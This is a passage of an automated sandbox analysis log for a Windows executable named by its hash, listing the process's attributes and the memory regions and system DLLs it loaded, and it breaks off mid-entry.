# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 05.08.2022 11:47:50.903 Process: id = "1" image_name = "f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" page_root = "0x16969000" os_pid = "0x13ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x400000 end_va = 0x4fbfff monitored = 1 entry_point = 0x4a3b74 region_type = mapped_file name = "f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe") Region: id = 126 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 127 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 128 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 129 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 130 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 131 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 274 start_va = 0x500000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 275 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 276 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 277 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 279 start_va = 0x5d0000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 280 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 281 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 282 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 283 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 284 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 285 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 286 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 287 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 288 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 289 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 290 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 291 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 292 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 293 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 294 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 295 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 296 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 297 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 298 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 299 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 300 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 301 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 302 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 303 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 304 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 305 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 306 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 307 start_va = 0x850000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 308 start_va = 0x6f990000 end_va = 0x6fa21fff monitored = 0 entry_point = 0x6f99dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 309 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 310 start_va = 0x6f920000 end_va = 0x6f986fff monitored = 0 entry_point = 0x6f935a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 311 start_va = 0x610000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 312 start_va = 0x950000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 313 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 314 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 315 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 316 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 317 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 318 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 319 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 320 start_va = 0x741e0000 end_va = 0x742d1fff monitored = 0 entry_point = 0x74218070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 321 start_va = 0x76b60000 end_va = 0x76bbdfff monitored = 0 entry_point = 0x76b77470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 322 start_va = 0x76be0000 end_va = 0x76bf2fff monitored = 0 entry_point = 0x76be1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 323 start_va = 0x6f8f0000 end_va = 0x6f913fff monitored = 0 entry_point = 0x6f8f4820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 324 start_va = 0x6f8b0000 end_va = 0x6f8edfff monitored = 0 entry_point = 0x6f8b2150 region_type = mapped_file name = "url.dll" filename = "\\Windows\\SysWOW64\\url.dll" (normalized: "c:\\windows\\syswow64\\url.dll") Region: id = 325 start_va = 0x72d60000 end_va = 0x72d6afff monitored = 0 entry_point = 0x72d61d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 326 start_va = 0x6f880000 end_va = 0x6f8a2fff monitored = 0 entry_point = 0x6f888940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 327 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 328 start_va = 0x72fe0000 end_va = 0x73b78fff monitored = 0 entry_point = 0x731b6970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 329 start_va = 0xa50000 end_va = 0xbd7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 330 start_va = 0xbe0000 end_va = 0xc09fff monitored = 0 entry_point = 0xbe5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 331 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 332 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 333 start_va = 0xbe0000 end_va = 0xd60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 334 start_va = 0xd70000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 335 start_va = 0x2170000 end_va = 0x2170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 336 start_va = 0x2180000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 337 start_va = 0x2210000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 338 start_va = 0x72d30000 end_va = 0x72d5bfff monitored = 0 entry_point = 0x72d45ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 339 start_va = 0x2180000 end_va = 0x2183fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 340 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 341 start_va = 0x23a0000 end_va = 0x26d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 342 start_va = 0x2190000 end_va = 0x2191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 343 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 344 start_va = 0x21a0000 end_va = 0x21a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 345 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 346 start_va = 0x2210000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 347 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 348 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 349 start_va = 0x26e0000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 350 start_va = 0x21a0000 end_va = 0x21a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 351 start_va = 0x2770000 end_va = 0x282bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002770000" filename = "" Region: id = 352 start_va = 0x21a0000 end_va = 0x21a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 353 start_va = 0x21c0000 end_va = 0x21c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 354 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 355 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 356 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 357 start_va = 0x21e0000 end_va = 0x21e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 358 start_va = 0x21f0000 end_va = 0x21f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.10586.0_en-us_972708e598ea5618\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.10586.0_en-us_972708e598ea5618\\comctl32.dll.mui") Region: id = 359 start_va = 0x2830000 end_va = 0x2d21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002830000" filename = "" Region: id = 360 start_va = 0x2d30000 end_va = 0x3d6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 361 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 362 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 363 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 364 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 365 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 366 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 367 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 368 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 369 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 370 start_va = 0x3d70000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 371 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 372 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 373 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 374 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 375 start_va = 0x3e70000 end_va = 0x3f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 376 start_va = 0x6f870000 end_va = 0x6f87cfff monitored = 0 entry_point = 0x6f8763e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 377 start_va = 0x6f870000 end_va = 0x6f875fff monitored = 0 entry_point = 0x6f8715d0 region_type = mapped_file name = "mssip32.dll" filename = "\\Windows\\SysWOW64\\mssip32.dll" (normalized: "c:\\windows\\syswow64\\mssip32.dll") Region: id = 378 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 379 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 380 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 381 start_va = 0x6f870000 end_va = 0x6f875fff monitored = 0 entry_point = 0x6f8715d0 region_type = mapped_file name = "mssip32.dll" filename = "\\Windows\\SysWOW64\\mssip32.dll" (normalized: "c:\\windows\\syswow64\\mssip32.dll") Region: id = 382 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 383 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 384 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 385 start_va = 0x6f870000 end_va = 0x6f875fff monitored = 0 entry_point = 0x6f8715d0 region_type = mapped_file name = "mssip32.dll" filename = "\\Windows\\SysWOW64\\mssip32.dll" (normalized: "c:\\windows\\syswow64\\mssip32.dll") Region: id = 386 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 387 start_va = 0x764c0000 